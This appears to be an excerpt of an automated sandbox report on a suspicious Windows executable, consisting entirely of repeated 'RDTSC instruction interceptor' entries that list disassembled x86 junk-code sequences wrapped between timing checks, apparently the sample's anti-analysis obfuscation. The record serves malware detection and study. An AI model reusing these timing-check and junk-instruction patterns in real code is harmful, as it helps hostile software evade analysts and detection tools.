Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C102CF second address: 4C10310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov edx, dword ptr [esi+44h] 0x00000009 pushad 0x0000000a jmp 00007FD1807ED555h 0x0000000f mov dx, si 0x00000012 popad 0x00000013 or edx, dword ptr [ebp+0Ch] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD1807ED559h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C10310 second address: 4C10344 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FD180B5C163h 0x00000017 mov edx, eax 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C10344 second address: 4C1034A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C008F5 second address: 4C0097F instructions: 0x00000000 rdtsc 0x00000002 call 00007FD180B5C164h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d jmp 00007FD180B5C161h 0x00000012 and esp, FFFFFFF8h 0x00000015 jmp 00007FD180B5C15Eh 0x0000001a xchg eax, ebx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FD180B5C15Eh 0x00000022 sub eax, 3E643188h 0x00000028 jmp 00007FD180B5C15Bh 0x0000002d popfd 0x0000002e mov ebx, esi 0x00000030 popad 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007FD180B5C15Eh 0x0000003b and ecx, 66F713E8h 0x00000041 jmp 00007FD180B5C15Bh 0x00000046 popfd 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C0097F second address: 4C0099F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED555h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C0099F second address: 4C009A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C009A3 second address: 4C009A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C009A9 second address: 4C009C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C162h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edi, ax 0x00000010 push eax 0x00000011 pop ebx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C009C9 second address: 4C00A26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD1807ED551h 0x00000008 mov edi, eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 mov edi, 0C63314Ch 0x00000015 jmp 00007FD1807ED555h 0x0000001a popad 0x0000001b push ecx 0x0000001c mov cx, dx 0x0000001f pop edi 0x00000020 popad 0x00000021 xchg eax, esi 0x00000022 jmp 00007FD1807ED556h 0x00000027 mov esi, dword ptr [ebp+08h] 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov esi, edi 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C00A26 second address: 4C00AF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C165h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b pushad 0x0000000c push edx 0x0000000d call 00007FD180B5C168h 0x00000012 pop esi 0x00000013 pop ebx 0x00000014 pushad 0x00000015 call 00007FD180B5C15Eh 0x0000001a pop ecx 0x0000001b movsx edx, ax 0x0000001e popad 0x0000001f popad 0x00000020 test esi, esi 0x00000022 pushad 0x00000023 jmp 00007FD180B5C168h 0x00000028 pushfd 0x00000029 jmp 00007FD180B5C162h 0x0000002e adc al, 00000048h 0x00000031 jmp 00007FD180B5C15Bh 0x00000036 popfd 0x00000037 popad 0x00000038 je 00007FD1F2E81A34h 0x0000003e pushad 0x0000003f pushfd 0x00000040 jmp 00007FD180B5C164h 0x00000045 add cx, BBA8h 0x0000004a jmp 00007FD180B5C15Bh 0x0000004f popfd 0x00000050 movzx eax, dx 0x00000053 popad 0x00000054 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e push ecx 0x0000005f pop edx 0x00000060 mov ebx, eax 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C00AF0 second address: 4C00B53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD1807ED54Bh 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ecx, esi 0x0000000e jmp 00007FD1807ED552h 0x00000013 je 00007FD1F2B12DD3h 0x00000019 jmp 00007FD1807ED550h 0x0000001e test byte ptr [76FB6968h], 00000002h 0x00000025 pushad 0x00000026 mov ax, 522Dh 0x0000002a popad 0x0000002b jne 00007FD1F2B12DC3h 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FD1807ED552h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C00B53 second address: 4C00B65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD180B5C15Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C00B65 second address: 4C00B69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C00B69 second address: 4C00BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b pushad 0x0000000c mov eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007FD180B5C15Fh 0x00000016 add ax, DE6Eh 0x0000001b jmp 00007FD180B5C169h 0x00000020 popfd 0x00000021 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C00BA8 second address: 4C00BCE instructions: 0x00000000 rdtsc 0x00000002 mov eax, 5AB423F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebx 0x0000000b jmp 00007FD1807ED54Ah 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD1807ED54Eh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C00BCE second address: 4C00BF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 42C4h 0x00000007 mov bx, C730h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebx 0x0000000f jmp 00007FD180B5C15Fh 0x00000014 xchg eax, ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 movsx edi, cx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C00BF4 second address: 4C00C19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bh, cl 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C00C19 second address: 4C00C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C00C1E second address: 4C00C3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED552h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C00C3B second address: 4C00C41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C00C41 second address: 4C00C47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C00C47 second address: 4C00C4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C00C4B second address: 4C00C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+14h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD1807ED559h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C00C71 second address: 4C00C76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C10E33 second address: 4C10E37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C10E37 second address: 4C10E50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C165h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C10E50 second address: 4C10E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C10E56 second address: 4C10E65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C10E65 second address: 4C10E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C10E69 second address: 4C10E6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C10AE2 second address: 4C10B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, ebp 0x00000006 jmp 00007FD1807ED54Ah 0x0000000b push eax 0x0000000c jmp 00007FD1807ED54Bh 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD1807ED550h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C10B13 second address: 4C10B17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C10B17 second address: 4C10B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C10B1D second address: 4C10B23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C10B23 second address: 4C10B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C10B27 second address: 4C10B2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C10B2B second address: 4C10B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C10B3B second address: 4C10B4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C10B4C second address: 4C10B5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD1807ED54Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C10B5C second address: 4C10B76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov esi, 0050303Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C9070F second address: 4C9071E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C8085E second address: 4C80864 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C80864 second address: 4C80868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C80868 second address: 4C8086C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C8086C second address: 4C8087A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c mov ah, 35h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C8087A second address: 4C808C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C167h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FD180B5C168h 0x0000000f add si, 58D8h 0x00000014 jmp 00007FD180B5C15Bh 0x00000019 popfd 0x0000001a popad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C808C7 second address: 4C808CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C808CB second address: 4C808CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C808CF second address: 4C808D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C808D5 second address: 4C808ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C808ED second address: 4C80900 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C80900 second address: 4C80906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C80906 second address: 4C8090A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C8090A second address: 4C80934 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD180B5C165h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C80934 second address: 4C8093A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C8093A second address: 4C8093E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C8093E second address: 4C80957 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a pushad 0x0000000b call 00007FD1807ED54Bh 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C80727 second address: 4C8072D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C8072D second address: 4C80731 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C80731 second address: 4C8074E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD180B5C160h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C8074E second address: 4C80752 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C80752 second address: 4C80758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C80758 second address: 4C80794 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD1807ED54Ch 0x00000009 adc si, 62A8h 0x0000000e jmp 00007FD1807ED54Bh 0x00000013 popfd 0x00000014 push esi 0x00000015 pop edi 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esp], ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FD1807ED551h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C80794 second address: 4C80799 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C20227 second address: 4C20253 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FD1807ED553h 0x00000012 pop eax 0x00000013 mov ecx, edx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C20253 second address: 4C202B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD180B5C160h 0x00000008 push ecx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f jmp 00007FD180B5C15Dh 0x00000014 pushfd 0x00000015 jmp 00007FD180B5C160h 0x0000001a xor cl, 00000008h 0x0000001d jmp 00007FD180B5C15Bh 0x00000022 popfd 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FD180B5C165h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C202B3 second address: 4C202B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C202B9 second address: 4C202BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C202BD second address: 4C202CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushad 0x0000000c mov dh, 9Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C80BB0 second address: 4C80BDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C160h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD180B5C167h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C80BDF second address: 4C80C2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD1807ED54Fh 0x00000009 sbb eax, 44BDDF1Eh 0x0000000f jmp 00007FD1807ED559h 0x00000014 popfd 0x00000015 jmp 00007FD1807ED550h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push edx 0x00000022 pop esi 0x00000023 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C80C2B second address: 4C80C88 instructions: 0x00000000 rdtsc 0x00000002 mov bx, 4A3Ah 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movsx edx, ax 0x0000000e mov ecx, 72B097BFh 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 movzx ecx, di 0x0000001a movsx edx, ax 0x0000001d popad 0x0000001e push dword ptr [ebp+0Ch] 0x00000021 pushad 0x00000022 popad 0x00000023 push dword ptr [ebp+08h] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FD180B5C15Fh 0x0000002f xor esi, 392953EEh 0x00000035 jmp 00007FD180B5C169h 0x0000003a popfd 0x0000003b movzx ecx, dx 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C80C88 second address: 4C80CA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD1807ED559h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C80CA5 second address: 4C80D4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call 00007FD180B5C159h 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FD180B5C163h 0x00000017 adc cx, 0C0Eh 0x0000001c jmp 00007FD180B5C169h 0x00000021 popfd 0x00000022 popad 0x00000023 push eax 0x00000024 pushad 0x00000025 pushad 0x00000026 mov dl, 3Dh 0x00000028 mov cx, BAA5h 0x0000002c popad 0x0000002d mov edx, ecx 0x0000002f popad 0x00000030 mov eax, dword ptr [esp+04h] 0x00000034 jmp 00007FD180B5C167h 0x00000039 mov eax, dword ptr [eax] 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e mov edx, esi 0x00000040 pushfd 0x00000041 jmp 00007FD180B5C15Eh 0x00000046 and si, 2018h 0x0000004b jmp 00007FD180B5C15Bh 0x00000050 popfd 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4C80D4A second address: 4C80D94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007FD1807ED54Bh 0x0000000b xor ax, 44DEh 0x00000010 jmp 00007FD1807ED559h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d pushad 0x0000001e mov ecx, edx 0x00000020 mov bh, 8Ah 0x00000022 popad 0x00000023 pop eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 movsx ebx, ax 0x0000002a mov ecx, 74DB3F8Fh 0x0000002f popad 0x00000030 rdtsc
